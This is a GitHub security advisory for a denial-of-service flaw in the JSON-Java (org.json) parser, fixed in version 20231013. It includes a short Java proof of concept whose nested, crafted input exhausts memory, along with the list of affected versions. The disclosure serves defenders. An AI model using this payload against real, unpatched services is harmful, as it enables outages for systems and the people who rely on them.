GHSA-4jq9-2xhw-jpx7

Suggest an improvement
Source
https://github.com/advisories/GHSA-4jq9-2xhw-jpx7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-4jq9-2xhw-jpx7/GHSA-4jq9-2xhw-jpx7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4jq9-2xhw-jpx7
Aliases
Related
Published
2023-11-14T22:24:08Z
Modified
2024-11-28T05:36:39.453647Z
Summary
Java: DoS Vulnerability in JSON-JAVA
Details

Summary

A denial of service vulnerability in JSON-Java was discovered by ClusterFuzz. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using \ to escape special characters, including \ itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of \ characters in the escaped string.

Severity

High - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.

Proof of Concept

package orgjsonbug;

import org.json.JSONObject;

/**
 * Illustrates a bug in JSON-Java.
 */
public class Bug {
  private static String makeNested(int depth) {
    if (depth == 0) {
      return "{\"a\":1}";
    }
    return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
  }

  public static void main(String[] args) {
    String input = makeNested(30);
    System.out.printf("Input string has length %d: %s\n", input.length(), input);
    JSONObject output = new JSONObject(input);
    System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
  }
}

When run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.

Further Analysis

The issue is fixed by this PR.

Timeline

Date reported: 07/14/2023 Date fixed: Date disclosed: 10/12/2023

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-358"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-14T22:24:08Z"
}
References

Affected packages

Maven / org.json:json

Package

Name
org.json:json
View open source insights on deps.dev
Purl
pkg:maven/org.json/json

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
20231013

Affected versions

Other

20070829
20080701
20090211
20131018
20140107
20141113
20150729
20151123
20160212
20160807
20160810
20170516
20171018
20180130
20180813
20190722
20200518
20201115
20210307
20211205
20220320
20220924
20230227
20230618

Database specific

{
    "last_known_affected_version_range": "<= 20230618"
}